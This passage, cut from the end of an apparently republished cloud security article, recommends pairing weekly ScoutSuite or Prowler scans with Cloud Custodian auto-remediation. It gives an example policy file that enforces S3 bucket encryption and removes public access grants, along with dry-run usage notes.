    The best approach is to combine them: run ScoutSuite or Prowler weekly to find issues, and let Cloud Custodian handle automatic fixes. Even a few hours spent setting these up can stop the kind of data leaks that make headlines. Always assume every bucket is public until proven otherwise — and secure it like it is.
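    To make the Cloud Custodian step above concrete, here is an added example policy file. It is constructed for this tip and is not code from the article or from the Cloud Custodian project; it relies on Cloud Custodian's documented `aws.s3` resource and its `bucket-encryption`, `global-grants`, `set-bucket-encryption`, `delete-global-grants` and `set-public-block` filters and actions. The account id, role ARN and file name are placeholders you would replace with your own.

```yaml
# Added example (not from the article): two Cloud Custodian policies covering
# the S3 misconfigurations discussed above, missing default encryption and
# public ACL grants. Role ARN and account id are placeholders.
policies:

  # 1. Event-driven policy: fires on the CloudTrail CreateBucket event, so a
  #    bucket created without default encryption is fixed as it appears
  #    rather than at the next weekly scan. SSE-S3 (AES256) is applied; use
  #    crypto: aws:kms plus a key if your standard requires KMS.
  - name: s3-enforce-default-encryption
    resource: aws.s3
    description: Turn on default server-side encryption for new buckets that lack it
    mode:
      type: cloudtrail
      events:
        - CreateBucket
      role: arn:aws:iam::123456789012:role/CustodianPlaceholderRole  # placeholder
    filters:
      - type: bucket-encryption
        state: false          # matches buckets with no default encryption
    actions:
      - type: set-bucket-encryption
        crypto: AES256

  # 2. Pull-mode policy for the weekly sweep: find existing buckets whose ACL
  #    grants access to AllUsers or AuthenticatedUsers, strip those grants,
  #    and enable the bucket-level public access block so they cannot return.
  - name: s3-remove-public-grants
    resource: aws.s3
    description: Remove public ACL grants and block public access on existing buckets
    filters:
      - type: global-grants
    actions:
      - delete-global-grants
      - type: set-public-block
        BlockPublicAcls: true
        IgnorePublicAcls: true
        BlockPublicPolicy: true
        RestrictPublicBuckets: true
```

    Check the file with `custodian validate s3-bucket-hygiene.yml` (placeholder file name), then run the sweep as `custodian run -s out --dryrun s3-bucket-hygiene.yml` first: dry-run mode writes the matched buckets to the output directory without applying the actions, which is the "find" half of the weekly routine described above. Drop `--dryrun` once the resource list looks right. Note that `global-grants` skips buckets configured for static website hosting by default, so an intentionally public website bucket is not silently broken; review those separately.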

    Conclusion

    The truth is, no tool or patch will ever make us fully secure. What matters most is awareness — knowing what’s normal, what’s changing, and how attackers think. Every alert, log, or minor anomaly is a clue. Keep connecting those dots before someone else does.


    Source: thehackernews.com…